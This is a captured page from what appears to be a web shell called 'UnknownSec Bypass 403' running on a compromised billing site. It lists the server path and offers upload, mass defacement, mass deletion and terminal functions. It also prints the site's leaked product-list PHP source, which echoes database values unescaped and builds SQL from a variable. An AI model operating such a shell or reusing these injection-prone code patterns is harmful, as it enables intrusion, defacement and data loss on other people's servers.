UnknownSec Bypass
403
:
/
var
/
www
/
stbilling
/
cpanel
/ [
drwxrwxr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
list_product.php
<?php include "top.php";?> <!-- main content start--> <div id="page-wrapper"> <div class="main-page"> <div class="tables"> <div class="row"> <div class="col-md-3 grid_box1"> <h4>PRODUCT LIST:</h4> </div> <div class="col-md-7 grid_box1"> </div> <div class="col-md-2 grid_box1"> <a href="add_product.php" class="btn btn-primary" style="width: 100%">Add Product</a> </div> <div class="clearfix"> </div> </div> <div class="table-responsive bs-example widget-shadow"> <div class="row"> <?php $sql="Select * from master where Identifier=3 and isdeleted='$notdeleted' and modificationdatetime is null ORDER BY masterid desc"; $result=mysqli_query($conn, $sql) or die("Query Failed."); if (mysqli_num_rows($result)>0) { ?> <table class="table table-bordered table-hovered table-striped" id="employeeTable"> <thead> <th> S.No. </th> <th> Name </th> <th> Unit </th> <th> Sales Price </th> <th style="width:30px;"></th> <th style="width:30px;"></th> </thead> <tbody> <?php $serial= 1; while ($row = mysqli_fetch_assoc($result)) { ?> <tr> <td><?php echo $serial ?> </td> <td><?php echo $row['name']; ?> </td> <td><?php echo $row['unit']; ?> </td> </td> <td><?php echo $row['salesprice']; ?> </td> <td><a href='add_product.php?id=<?php echo $row["masterid"]; ?>&op=<?php echo "Update"; ?>'><i class=" glyphicon glyphicon-pencil"></i></a></td> <td></td> </tr> <?php $serial++; } } ?> </tbody> </table> <br> </div> </div> </div> </div> </div> <?php include "footer.php";?> <script> $(document).ready(function() { $('#employeeTable').DataTable(); }); </script>
Copyright © 2025 - UnknownSec